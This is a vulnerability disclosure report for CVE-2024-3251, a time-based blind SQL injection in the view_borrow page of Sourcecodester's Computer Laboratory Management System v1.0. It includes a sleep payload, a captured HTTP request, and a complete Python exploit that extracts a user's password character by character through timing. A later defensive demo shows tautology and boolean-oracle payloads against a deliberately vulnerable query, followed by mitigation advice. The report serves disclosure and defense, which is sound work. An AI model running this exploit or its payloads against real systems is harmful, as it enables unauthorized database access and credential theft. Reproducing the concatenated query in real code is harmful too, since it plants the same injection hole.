CVE-2024-3251 - Time-Based Blind SQL Injection in CLMS v1.0

Vulnerability Proof of Concept Report

Summary

  • CVE ID: CVE-2024-3251
  • Vendor: Sourcecodester
  • Product: Computer Laboratory Management System
  • Product Link: Product
  • Affected Versions: v1.0
  • Fixed in Version: Not Fixed
  • Vulnerability Type: Time-Based Blind SQL Injection
  • Severity: Critical
  • Researchers: Simon Bertrand (Almightysec)
  • Disclosure Date: 04/01/2024

Vulnerability Description

An SQL Injection vulnerability has been identified in the view_borrow function of Sourcecodester Computer Laboratory Management System v1.0, reachable through the id parameter. The value of id is incorporated into an SQL query without validation or sanitization, so an attacker can append arbitrary SQL and have it executed against the application's backend database. The page does not reflect query results directly, so the issue is exploited as a time-based blind injection: the attacker attaches a conditional SLEEP() and infers data from response delays. This still allows unauthorized access, data exfiltration, or database corruption.

Affected Components

The SQL injection vulnerability affects the view_borrow function, specifically through the id parameter in the URL query string. This component is part of the administrative backend of the Computer Laboratory Management System, intended for managing borrowing records.

  • URL Path: /admin/?page=borrow/view_borrow&id=
  • Parameter: id
  • Function: view_borrow
  • Location: Administrative backend, under the Borrows management section.

The application builds the query for this page dynamically from the id parameter and executes it without validating or sanitizing the value first. As a result, anyone who can reach the page can manipulate id to inject arbitrary SQL, affecting the integrity and confidentiality of the database and potentially leading to unauthorized access, data exfiltration, or manipulation of stored records.

Steps to Reproduce

Follow these steps to reproduce the vulnerability. Use this section responsibly: only authorized individuals should perform these actions, in a safe and legal test environment.

  1. Environment Setup: install CLMS v1.0 locally. The captured request below assumes the application is served at http://localhost/php-lms/.
  2. Initial Conditions:
    • From the Administration panel, create a low-privilege user.
    • Log out from the Administrator account.
    • Log in as the low-privilege user.
  3. Reproduction Steps:
    • Step 1: Click on the Borrows tab.
    • Step 2: Click on View for any record; the browser requests /admin/?page=borrow/view_borrow&id=<n>.
    • Step 3: Capture the request in an intercepting proxy and send it to Repeater.
    • Step 4: Append the sleep payload to the id value: '+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))exploit)--+
    • Step 5: Confirm that the response arrives about 5 seconds later than the unmodified request. Repeat with SLEEP(0) and with a longer delay (for example SLEEP(10)) to rule out ordinary network latency before concluding that the injection works.

POC:

GET /php-lms/admin/?page=borrow/view_borrow&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))exploit)--+ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/php-lms/admin/?page=borrow
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Connection: close

Exploit Code:

import os
import sys
import time

import requests


class Colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


# Seconds of delay requested through SLEEP(); a response at least this slow means the condition held.
DELAY = 5


def banner():
    print(f"{Colors.HEADER}SQL injection in LMS-PHP v1.0{Colors.ENDC}")
    print(f"{Colors.OKBLUE}---------------------------------{Colors.ENDC}\n")


def print_help():
    print("Usage: python exploit.py <URL>")
    print("Example: python exploit.py http://example.com")
    print("The vulnerable page lives in the admin backend, so export PHPSESSID=<cookie of a logged-in user>")
    print("(any account works, see Steps to Reproduce).")
    sys.exit(1)


def check_condition(url, session, condition):
    # Time-based oracle: IF(condition, SLEEP(DELAY), 0) is appended to the injectable id parameter.
    injected_url = f"{url}'+AND+IF({condition},SLEEP({DELAY}),0)--+"
    start_time = time.time()
    # A timeout well above DELAY keeps the loop from hanging forever if the server stalls.
    session.get(injected_url, timeout=DELAY * 4)
    return time.time() - start_time >= DELAY


def extract_char_at_pos(url, session, pos):
    # Binary search over printable ASCII (32-126) for the character at position `pos`;
    # each probe costs one request and, when the condition is true, DELAY seconds.
    low, high = 32, 126
    while low <= high:
        mid = (low + high) // 2
        # lms_db.users is the schema assumed by the original PoC; adjust for other deployments.
        condition = (
            "ascii(substring((SELECT password FROM lms_db.users WHERE id=1 LIMIT 1),"
            f"{pos},1))>{mid}"
        )
        if check_condition(url, session, condition):
            low = mid + 1
        else:
            high = mid - 1
    return chr(low)


def extract_data(url, session_cookie=None):
    session = requests.Session()
    if session_cookie:
        # PHPSESSID is PHP's default session cookie name (assumed here for this PHP application).
        session.cookies.set("PHPSESSID", session_cookie)
    extracted = ""
    for pos in range(1, 33):  # 32 characters, the value length the original PoC assumes
        extracted += extract_char_at_pos(url, session, pos)
        print(f"{Colors.OKGREEN}Extracted so far: {extracted}{Colors.ENDC}")
    print(f"{Colors.OKGREEN}Full extracted data: {extracted}{Colors.ENDC}")
    return extracted


def main():
    banner()
    if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:
        print_help()

    url = sys.argv[1].rstrip("/") + "/php-lms/admin/?page=borrow/view_borrow&id=1"
    extract_data(url, os.environ.get("PHPSESSID"))


if __name__ == "__main__":
    main()

Impact Analysis

The identified SQL Injection vulnerability poses significant risk to the confidentiality, integrity, and availability of the Computer Laboratory Management System and its data. Note that the reproduction above uses a low-privilege account: any authenticated user of the application, not only an administrator, can reach the vulnerable page. Specifically:

  • Data Exposure: Confidential data, including student records, administrative information, and potentially sensitive personal data, could be extracted by unauthorized parties. This exposure risks privacy breaches and regulatory non-compliance.
  • Unauthorized Access: Attackers might gain unauthorized access to other parts of the system or escalate their privileges, allowing them to alter system configurations, manipulate data, or disrupt operational integrity.
  • Service Disruption: By exploiting this vulnerability, attackers could render the system unstable or entirely unavailable, affecting the day-to-day operations of the computer laboratory management.
  • Reputational Damage: Incidents arising from this vulnerability could erode trust among stakeholders, including students, faculty, and administration, potentially leading to a decline in system usage and confidence in the institution’s cybersecurity posture.

Mitigation and Recommendations

To mitigate the identified vulnerability and reduce potential impacts, the following steps are recommended:

  • Immediate Patching: If the vendor releases a patch, apply it immediately. Given the absence of a fix, consider the following temporary measures.
  • Input Validation: The id parameter is a record number, so cast it to an integer (or reject any value that is not all digits) before it reaches the query. More generally, validate every input against an allowlist of the characters and format it may contain.
  • Prepared Statements: Use prepared statements with parameterized queries for every database interaction, so that user-supplied values are bound as data and never parsed as SQL. This is the primary fix; input validation on its own is a stopgap.
  • Error Handling: Customize error messages to avoid revealing details about the database structure or pointing to existing vulnerabilities.
  • Regular Auditing: Conduct regular security audits and vulnerability assessments of the system to identify and mitigate potential vulnerabilities proactively.
  • Security Awareness: Enhance security awareness among developers and administrators regarding common vulnerabilities and secure coding practices.
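As an added example, not code from the original report or from the CLMS project, the following Python/SQLite snippet places the flaw described under Affected Components (the id value concatenated into a quoted SQL string) beside the two hardening layers recommended above: a parameterized query, then allowlist validation of id in front of it. The table layout (borrow_list with id, borrower, item) and the sample rows are constructed for the demonstration, not the real CLMS schema. SQLite has no SLEEP(), so the blind oracle is shown in its boolean form (one row returned versus none); the time-based exploit above performs the same per-character inference using delays instead of row counts.

```python
import sqlite3

# Constructed sample data; the table layout is hypothetical, not the real CLMS schema.
SAMPLE_ROWS = [
    (1, "alice", "Laptop A"),
    (2, "bob", "Projector"),
    (3, "carol", "Laptop B"),
]


def make_db():
    """In-memory database standing in for the application's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE borrow_list (id INTEGER PRIMARY KEY, borrower TEXT, item TEXT)")
    conn.executemany("INSERT INTO borrow_list VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def view_borrow_vulnerable(conn, user_id):
    """The flaw: id is concatenated into the query inside quotes, exactly the
    shape the report's payload (1'+AND+...--+) closes and extends."""
    query = f"SELECT id, borrower, item FROM borrow_list WHERE id = '{user_id}'"
    return conn.execute(query).fetchall()


def view_borrow_parameterized(conn, user_id):
    """Layer 1: a prepared statement. The value is bound, never parsed as SQL,
    so an injected payload is compared literally and matches nothing."""
    return conn.execute(
        "SELECT id, borrower, item FROM borrow_list WHERE id = ?", (user_id,)
    ).fetchall()


def validate_id(user_id):
    """Layer 2: allowlist validation. A record id is a decimal number; anything
    else is rejected before it gets near the database."""
    if not isinstance(user_id, str) or not user_id.isdigit():
        raise ValueError(f"invalid id: {user_id!r}")
    return int(user_id)


def view_borrow_hardened(conn, user_id):
    """Both layers together: validate, then bind."""
    return view_borrow_parameterized(conn, validate_id(user_id))


def blind_oracle_payload(pos, char):
    """Boolean-blind probe: true (one row) when character `pos` of the first
    borrower's name equals `char`; the time-based variant swaps the row-count
    signal for IF(cond, SLEEP(n), 0)."""
    return f"1' AND (SELECT substr(borrower,{pos},1) FROM borrow_list WHERE id=1)='{char}'--"


if __name__ == "__main__":
    db = make_db()
    print("legit id:      ", view_borrow_vulnerable(db, "1"))
    print("tautology:     ", view_borrow_vulnerable(db, "1' OR '1'='1"))
    print("oracle 'a':    ", view_borrow_vulnerable(db, blind_oracle_payload(1, "a")))
    print("oracle 'z':    ", view_borrow_vulnerable(db, blind_oracle_payload(1, "z")))
    print("parameterized: ", view_borrow_parameterized(db, "1' OR '1'='1"))
    try:
        view_borrow_hardened(db, "1' OR '1'='1")
    except ValueError as exc:
        print("hardened:       rejected,", exc)
```

Run it and compare the three views of the same tautology payload: the vulnerable query returns every row, the parameterized query returns none (the payload is compared as a literal string), and the hardened version refuses the request before any query runs. The oracle payloads show why a blind injection needs no error message or echoed output: a one-row-versus-zero-row (or delayed-versus-prompt) difference per request is enough to recover data character by character.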

Vendor Communication

Timeline of communication with the vendor, including when the vulnerability was reported, any responses received, and the current status:

  • Reported On: 04/01/2024 - The vulnerability was reported
  • Acknowledged On: N/A - As of the last update, the vendor has not acknowledged the report.
  • Fixed On: N/A - A fix for the vulnerability has not been issued.
  • CVE Assigned On: 04/03/2024 - CVE assigned: CVE-2024-3251

Efforts to follow up with the vendor will continue, and updates will be provided as new information becomes available.

References

The first four references are the public records for this specific vulnerability (CVE-2024-3251); the remaining entries are general resources on SQL Injection and its prevention:

  1. CVE Mitre: Link
  2. NIST: Link
  3. CVE Details: link
  4. Vuldb: Link
  5. OWASP SQL Injection Prevention Cheat Sheet: Link
  6. OWASP Guide to SQL Injection: Link

This section will be updated as the vendor provides feedback or releases patches.

Acknowledgments

Special thanks to the cybersecurity and open-source communities for their invaluable tools and resources that support vulnerability research. Appreciation is extended to colleagues and peers for their insights and feedback during the vulnerability analysis process.


This report is provided “as is” for informational purposes only. The authors do not take any responsibility for misuse of this information. Researchers and testers should conduct their activities with respect to applicable laws and guidelines for ethical hacking.